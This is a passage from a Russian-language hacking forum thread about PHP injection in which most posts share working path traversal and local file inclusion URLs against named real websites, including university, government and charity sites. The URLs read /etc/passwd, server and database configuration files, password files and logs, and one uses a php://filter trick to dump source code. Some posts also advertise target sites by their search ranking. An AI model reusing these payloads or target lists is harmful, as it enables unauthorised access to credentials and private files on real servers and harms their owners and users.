PHP Иньекции

Discussion in 'Уязвимости' started by Joker-jar, 20 Apr 2007.

  1. valyka80

    valyka80 Banned

    Joined:
    14 Jun 2010
    Messages:
    163
    Likes Received:
    20
    Reputations:
    16
    http://climate.rutgers.edu/snowcover/docs.php?target=../../../../../../../../../../etc/passwd%00
     
  2. SHiNiGaMi

    SHiNiGaMi Banned

    Joined:
    3 Jan 2010
    Messages:
    389
    Likes Received:
    55
    Reputations:
    15
    http://www.playfish.com/?page=/etc/passwd%00
    http://rastaman.tales.ru/?page=/etc/passwd%00
     
    #1202 SHiNiGaMi, 29 Sep 2010
    Last edited: 30 Sep 2010
    1 person likes this.
  3. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,279
    Likes Received:
    1,148
    Reputations:
    886
    www.promariner.com/download.php?file=../../../../../../../../etc/passwd
     
    _________________________
  4. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    265
    Likes Received:
    227
    Reputations:
    386
    http://allrus.info/APL.php?h=/../../../../../../etc/logrotate.d/vsftpd.log
    http://allrus.info/APL.php?h=/../../../../../../etc/httpd/conf/httpd.conf
    http://allrus.info/APL.php?h=/../../../../../../etc/passwd
    http://allrus.info/APL.php?h=/../../../../../../etc/my.cnf
     
    2 people like this.
  5. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,279
    Likes Received:
    1,148
    Reputations:
    886
    http://www.fria.com.au/fria.php?page=../../../../../../../../../home/rirdc/.htpasswds/test/admin/passwd
     
    _________________________
    2 people like this.
  6. z0mbyak

    z0mbyak Active Member

    Joined:
    10 Apr 2010
    Messages:
    618
    Likes Received:
    203
    Reputations:
    293
    http://www.summer-fun.info/ru/index.php?pageid=php://filter/convert.base64-encode/resource=index
    Декодим из Base64 и читаем код индекса
     
    2 people like this.
  7. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,279
    Likes Received:
    1,148
    Reputations:
    886
    http://www.pogpet.am/sis/index.php?page=/var/log/dmesg
     
    _________________________
  8. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    378
    Likes Received:
    346
    Reputations:
    292
    http://metanohi.org/browse/no-js.php?u=../../../etc/passwd
    с лева читалка всех файлов..

    уязвимый код: browse/no-js.php

    PHP:
    <?php
    $qu 
    $_GET['u'];
    $qp $_GET['p'];
    $horsa '';
    if (
    $qu)
      
    $horsa "u=$qu";
    if (
    $qp == 'h') {
      
    $horst 'Show';
      
    $extrastyle '#name, #text {left:0}';
    }
    else {
      
    $horsa .= "&p=h";
      
    $horst 'Hide';
    }

    if (
    $qp != 'h') {
      include(
    '../lib/dirlst.php');
      
    $l = new dirlst();
      
    $lr $l->getraw();
      
    $tt "<ul>\n";
      
    $path = array();
      
      function 
    add($arr) {
        global 
    $tt$path;
        while (
    $c current($arr)) {
          
    $key key($arr);
          
    $carr $arr[$key];
              
          if (
    $key != '*files*') {
            
    $path[sizeof($path)] = $key;
            
    $tt .= "<li><p>$key</p><ul>";
            
            if (
    is_array($carr))
              
    add($carr);
            
            
    $files $arr[$key]['*files*'];
            if (
    is_array($files)) {
              
    $spath implode('/'$path) . '/';
              if (
    sizeof($arr[$key]) > 1)
                
    $tt .= "<div class='eh'> </div>";
              foreach (
    $files as $file) {
                
    $addr $spath $file;
                if (
    substr($filestrlen($file) - 11) != '~')
                  
    $tt .= "<li><a href='?u=$addr'>$file</a></li>";
              }
            }
            
    array_splice($pathsizeof($path) - 1);
            
            
    $tt .= "</ul></li>";
          }
          
    next($arr);
        }
      }
      
      
    add($lr);

      
    $tt .= "<div class='eh'> </div>";
      foreach (
    $lr['*files*'] as $file) {
        if (
    substr($filestrlen($file) - 11) != '~')
          
    $tt .= "<li><a href='?u=$file'>$file</a></li>";
      }
      
    $tt .= "</ul>";
    }

    $name $_GET['u'];
    if (!
    $name) {
      
    $name 'vijuv';
      
    $namet '#';
      
    $nametp '#';
    }
    else {
      
    $namet "../$name";
      
    $nametp "../:$name";
    }
    $text = include('get.php');
    if (!
    $text)
      
    $text 'Click on a filename in the left pane to show the content of that file.';
    ?>
     
    _________________________
    #1208 Дирижабль, 22 Oct 2010
    Last edited: 23 Oct 2010
    1 person likes this.
  9. valyka80

    valyka80 Banned

    Joined:
    14 Jun 2010
    Messages:
    163
    Likes Received:
    20
    Reputations:
    16
    http://townofryeny.gov:80/index.php?act=downloads&file_name=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
     
    2 people like this.
  10. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,279
    Likes Received:
    1,148
    Reputations:
    886
    http://www.sexpistolsofficial.com/index.php?module=../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00
     
    _________________________
  11. CodeSender:)

    CodeSender:) Active Member

    Joined:
    29 Jul 2010
    Messages:
    267
    Likes Received:
    115
    Reputations:
    23
    http://www.aroundthecapitol.com/code/getcode.html?file=../../../../../etc/passwd
     
  12. <Cyber-punk>

    <Cyber-punk> Smash the Stack

    Joined:
    1 Oct 2009
    Messages:
    664
    Likes Received:
    305
    Reputations:
    430
    Довесочек:

    И PR-6

     
    _________________________
    #1212 <Cyber-punk>, 30 Oct 2010
    Last edited: 30 Oct 2010
  13. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    265
    Likes Received:
    227
    Reputations:
    386
    http://otl.pomona.edu/main.php?p=../../../../../../etc/passwd%00
     
  14. Bramin

    Bramin Banned

    Joined:
    15 May 2009
    Messages:
    301
    Likes Received:
    89
    Reputations:
    27
    http://integ625.rsjp.net/file.php?id=../../../../../../../../etc/passwd
    http://www.technicalfacilitation.com/get.php?link=../../../../../etc/passwd%00
     
    #1214 Bramin, 8 Nov 2010
    Last edited: 8 Nov 2010
  15. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    427
    Likes Received:
    46
    Reputations:
    40
    http://www.wa-mongols.org/site/index.php?option=com_jesubmit&view=../../../../../../../../../../etc/passwd%00&Itemid=4
    http://www.protectedchildren.org/index.php?option=com_jesubmit&view=../../../../../../../../../../etc/passwd%00&Itemid=58
     
    #1215 pinch, 11 Nov 2010
    Last edited by a moderator: 11 Nov 2010
  16. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    217
    Likes Received:
    105
    Reputations:
    50
    http://www.arborbooks.com/index.php?id=index.php
     
  17. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    265
    Likes Received:
    257
    Reputations:
    154
    Тиц 90,PR 4
    http://gati-online.ru/index.php?option=com_ckforms&controller=../../../../../../../../etc/passwd%00
     
  18. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    736
    Likes Received:
    404
    Reputations:
    134
    читалка
     
    1 person likes this.
  19. SHiNiGaMi

    SHiNiGaMi Banned

    Joined:
    3 Jan 2010
    Messages:
    389
    Likes Received:
    55
    Reputations:
    15
    http://www.caldera.com/en/news.php?page=123
    http://www.britannica.com.au/pages.asp?page=pages.asp
     
    #1219 SHiNiGaMi, 23 Nov 2010
    Last edited: 24 Nov 2010
  20. DeepBlue7

    DeepBlue7 Elder - Старейшина

    Joined:
    2 Jan 2009
    Messages:
    359
    Likes Received:
    50
    Reputations:
    12
    http://www.fableportal.net/DOF/reader/Reader.php?id=Reader.php%00
     
    #1220 DeepBlue7, 2 Dec 2010
    Last edited: 2 Dec 2010
    1 person likes this.
Loading...